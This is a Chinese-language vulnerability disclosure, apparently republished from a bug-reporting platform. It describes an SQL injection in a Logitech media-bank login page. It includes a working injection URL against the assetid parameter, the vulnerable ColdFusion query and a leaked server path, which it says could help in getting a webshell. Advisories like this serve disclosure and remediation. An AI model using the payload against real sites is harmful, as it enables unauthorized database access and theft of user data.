罗技网站SQL注射漏洞可能泄露使用者信息_软件资讯_风信网

漏洞标题: 罗技网站SQL注入,可能泄露使用者信息
相关厂商: 罗技官方
漏洞作者: asmc
提交时间: 2012-10-08
公开时间: 2012-11-22
漏洞类型: SQL注射漏洞
危害等级: 中
自评Rank: 5
漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞详情

披露状态:

2012-10-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-11-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:
SQL注入,物理路径泄漏

详细说明:
漏洞位置在是一个用户登录的页面,但是这个页面的中的背景图片是动态调用得到,具体URL是
?x1=0&y1=0&x2=1&y2=1&format=&width=../&height=161&assetid=73806%20and%201=@@version
image.cfm未对参数assetid进行任何过滤,源代码暴漏了细节:

The error occurred in D:\mediabank\login\image.cfm: line 17
Called from 64-bit) on Windows NT 6.1 (Build 7601: line -1
Called from 64-bit) on Windows NT 6.1 (Build 7601: line -1
Called from D:\mediabank\login\image.cfm: line 17
15 :  <CFQUERY NAME="GetAsset" DATASOURCE="#datasource#">
16 :   SELECT * FROM MEDIA
17 :   WHERE ID=#url.assetid#
18 :  </CFQUERY>
19 :  <CFMODULE NAME="V2.GETNODEPATH" nodeID="#GetAsset.NODE_ID#">

2 返回结果页面还包含了物理路径,为进一步获取权限(webshell)提供了重要信息

审核人员看这里,看后删除谢谢(非常抱歉我提供提交过一次,由于第一次提交的内容有严重失误,提交后才明白过来,但是也没办法修改了,非常抱歉)

漏洞证明:

罗技网站SQL注射漏洞可能泄露使用者信息_软件资讯_风信网

修复方案:
验证参数类型,过滤敏感字符